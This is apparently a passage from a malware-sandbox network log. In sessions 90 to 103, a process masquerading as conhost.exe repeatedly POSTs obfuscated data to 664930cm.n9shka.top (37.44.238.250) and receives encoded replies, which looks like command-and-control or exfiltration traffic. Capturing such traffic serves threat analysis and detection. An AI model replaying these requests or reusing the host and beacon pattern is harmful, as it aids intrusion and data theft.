                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          90 | 192.168.2.6 | 49802 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 1, 2024 05:58:46.627408028 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:46.980992079 CEST | 1120 | OUT | Data Raw: 58 52 5a 59 5c 41 51 52 5c 58 57 5a 54 52 55 5d 59 5b 59 57 50 51 56 49 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XRZY\AQR\XWZTRU]Y[YWPQVI[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT":U "+4)_3.*Y1( 83<'(R%!>21?!(S+!F/'P,


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          91 | 192.168.2.6 | 49803 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 1, 2024 05:58:47.086890936 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1840
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:47.434097052 CEST | 1840 | OUT | Data Raw: 58 52 5a 5b 59 49 54 5f 5c 58 57 5a 54 5c 55 5f 59 57 59 56 50 5e 56 47 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XRZ[YIT_\XWZT\U_YWYVP^VG[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT":0?!8^>1!^'2X%_,0;V$7$1&Q%>28T?)!F/'P,
                                                          Oct 1, 2024 05:58:47.727000952 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:47.859420061 CEST | 308 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:47 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0e 1d 26 04 27 0a 2d 0e 21 5a 32 07 3e 3f 05 1e 27 27 02 06 2d 2d 2c 08 26 2f 27 5a 39 0b 25 03 2b 07 0f 04 25 3d 2f 5a 31 31 36 53 24 1c 20 5f 0d 10 22 58 22 16 36 51 2c 29 05 59 2a 22 34 42 32 0e 3f 1f 27 30 35 0f 3f 2e 24 55 27 5a 36 0a 30 12 35 0c 2c 35 01 02 3e 27 33 0d 23 2b 2d 56 02 1e 22 50 31 01 25 12 22 2c 36 04 30 38 2c 14 35 38 3d 57 3d 3e 3f 05 24 1a 2e 5e 3d 3d 02 03 2b 2c 3c 00 21 04 22 07 21 21 31 51 27 09 27 5c 20 0d 2d 51 05 34 5a 50
                                                          Data Ascii: &'-!Z2>?''--,&/'Z9%+%=/Z116S$ _"X"6Q,)Y*"4B2?'05?.$U'Z605,5>'3#+-V"P1%",608,58=W=>?$.^==+,<!"!!1Q''\ -Q4ZP


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          92 | 192.168.2.6 | 49804 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 1, 2024 05:58:47.344788074 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1112
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:47.699661970 CEST | 1112 | OUT | Data Raw: 5d 51 5a 58 5c 45 51 54 5c 58 57 5a 54 5b 55 5e 59 5b 59 56 50 50 56 46 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]QZX\EQT\XWZT[U^Y[YVPPVF[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!Y.# 5+?)-]0=>2?^;#0P&&-((9!F/'P,
                                                          Oct 1, 2024 05:58:47.971018076 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:48.105403900 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:47 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          93 | 192.168.2.6 | 49805 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 1, 2024 05:58:48.230947971 CEST | 347 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Oct 1, 2024 05:58:48.590233088 CEST | 1120 | OUT | Data Raw: 58 54 5f 59 59 40 54 50 5c 58 57 5a 54 5a 55 5c 59 53 59 5d 50 50 56 49 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XT_YY@TP\XWZTZU\YSY]PPVI[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"-W ;<^=2)^3%#\8/S$>'$22U&9( ?9!F/'P,-
                                                          Oct 1, 2024 05:58:48.836812019 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:48.965194941 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:48 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          94 | 192.168.2.6 | 49806 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 1, 2024 05:58:49.091048002 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:49.449748039 CEST | 1120 | OUT | Data Raw: 58 50 5f 5d 59 43 51 55 5c 58 57 5a 54 52 55 59 59 57 59 58 50 5a 56 41 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XP_]YCQU\XWZTRUYYWYXPZVA[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT".+V!($>"!$>*1(#;'#&.V%$>+;+!F/'P,
                                                          Oct 1, 2024 05:58:49.697241068 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:49.829682112 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:49 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          95 | 192.168.2.6 | 49807 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 1, 2024 05:58:49.952128887 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:50.309144020 CEST | 1120 | OUT | Data Raw: 58 52 5f 5b 59 43 51 52 5c 58 57 5a 54 52 55 59 59 5a 59 5b 50 5a 56 49 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XR_[YCQR\XWZTRUYYZY[PZVI[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!\9#'T!];)!_311#/ 8$X W$!$':[?,T(9!F/'P,
                                                          Oct 1, 2024 05:58:50.587229967 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:50.724678040 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:50 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          96 | 192.168.2.6 | 49808 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 1, 2024 05:58:50.865602970 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:51.215244055 CEST | 1120 | OUT | Data Raw: 58 55 5f 5a 5c 45 54 5e 5c 58 57 5a 54 5f 55 5e 59 57 59 5c 50 5a 56 41 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XU_Z\ET^\XWZT_U^YWY\PZVA[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"-#/T6>=]$-$(3/,'?2%)($W?)!F/'P,9
                                                          Oct 1, 2024 05:58:51.469536066 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:51.597157001 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:51 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          97 | 192.168.2.6 | 49809 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 1, 2024 05:58:51.720716000 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:52.076356888 CEST | 1120 | OUT | Data Raw: 58 5d 5f 59 59 49 54 53 5c 58 57 5a 54 5d 55 5b 59 57 59 5c 50 5d 56 43 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: X]_YYITS\XWZT]U[YWY\P]VC[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT".#$58;=1%3.>%</U;'Q%!&Q&.?T4(9!F/'P,1
                                                          Oct 1, 2024 05:58:52.333116055 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:52.493371010 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:52 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          98 | 192.168.2.6 | 49810 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 1, 2024 05:58:52.623450994 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          99 | 192.168.2.6 | 49811 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 1, 2024 05:58:52.877473116 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1820
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:53.230967045 CEST | 1820 | OUT | Data Raw: 5d 52 5f 58 5c 44 54 57 5c 58 57 5a 54 5f 55 51 59 55 59 5f 50 50 56 46 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]R_X\DTW\XWZT_UQYUY_PPVF[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!_.(!;;=)&>1& /7'%292>" T?9!F/'P,9
                                                          Oct 1, 2024 05:58:53.483678102 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:53.638500929 CEST | 308 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:53 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0e 1d 26 00 33 42 2e 55 20 2c 32 07 2a 06 2b 5c 27 37 09 19 2e 2e 23 1b 31 3f 3f 5b 39 32 3e 5c 28 39 3e 5a 32 2e 05 1e 31 0b 25 0b 33 0c 20 5f 0d 10 22 11 22 06 2e 54 2d 39 0d 1a 29 31 06 07 26 30 09 11 30 0d 21 0b 3c 3e 0e 55 26 3c 29 54 33 3f 39 0c 38 1b 2f 00 2b 27 38 53 34 3b 2d 56 02 1e 22 53 26 28 39 1f 37 3f 18 04 24 28 23 04 36 3b 29 13 29 58 3b 04 33 1d 39 04 2a 13 02 05 3c 2c 2b 5e 22 14 25 5c 23 31 31 1b 27 33 27 5c 20 0d 2d 51 05 34 5a 50
                                                          Data Ascii: &3B.U ,2*+\'7..#1??[92>\(9>Z2.1%3 _"".T-9)1&00!<>U&<)T3?98/+'8S4;-V"S&(97?$(#6;))X;39*<,+^"%\#11'3'\ -Q4ZP


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          100 | 192.168.2.6 | 49812 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 1, 2024 05:58:52.997246981 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:53.355865002 CEST | 1120 | OUT | Data Raw: 58 53 5f 5e 5c 44 54 54 5c 58 57 5a 54 5f 55 50 59 57 59 57 50 5e 56 45 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XS_^\DTT\XWZT_UPYWYWP^VE[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!]-30"4*:$>.&;$,3+W'>8&>2"?"$?!F/'P,9
                                                          Oct 1, 2024 05:58:53.628072023 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:53.756694078 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:53 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
101 | 192.168.2.6 | 49813 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:53.890151978 CEST | 347 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 664930cm.n9shka.top
Content-Length: 1120
Expect: 100-continue
Oct 1, 2024 05:58:54.246519089 CEST | 1120 | OUT | Data Raw: 58 55 5f 55 59 47 54 5f 5c 58 57 5a 54 5c 55 50 59 5a 59 5b 50 58 56 42 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
Data Ascii: XU_UYGT_\XWZT\UPYZY[PXVB[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"937!+*2)^'-11(/3+S%=4R1!141?4S()!F/'P,
Oct 1, 2024 05:58:54.496187925 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:54.625339031 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Oct 2024 03:58:54 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3c 55 5c 50
Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
102 | 192.168.2.6 | 49814 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:54.748373032 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 664930cm.n9shka.top
Content-Length: 1120
Expect: 100-continue
Connection: Keep-Alive
Oct 1, 2024 05:58:55.108308077 CEST | 1120 | OUT | Data Raw: 5d 52 5a 5e 59 42 51 54 5c 58 57 5a 54 5f 55 5b 59 55 59 5b 50 50 56 49 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
Data Ascii: ]RZ^YBQT\XWZT_U[YUY[PPVI[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!Y9/"];)-\3>&^&(;Y8 3>P&!$$&+",*9!F/'P,9
Oct 1, 2024 05:58:55.382473946 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:55.515005112 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Oct 2024 03:58:55 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3c 55 5c 50
Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
103 | 192.168.2.6 | 49815 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:55.651913881 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 664930cm.n9shka.top
Content-Length: 1120
Expect: 100-continue
Connection: Keep-Alive
Oct 1, 2024 05:58:55.996628046 CEST | 1120 | OUT | Data Raw: 58 54 5f 58 59 49 51 52 5c 58 57 5a 54 5f 55 5b 59 52 59 5f 50 5a 56 48 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
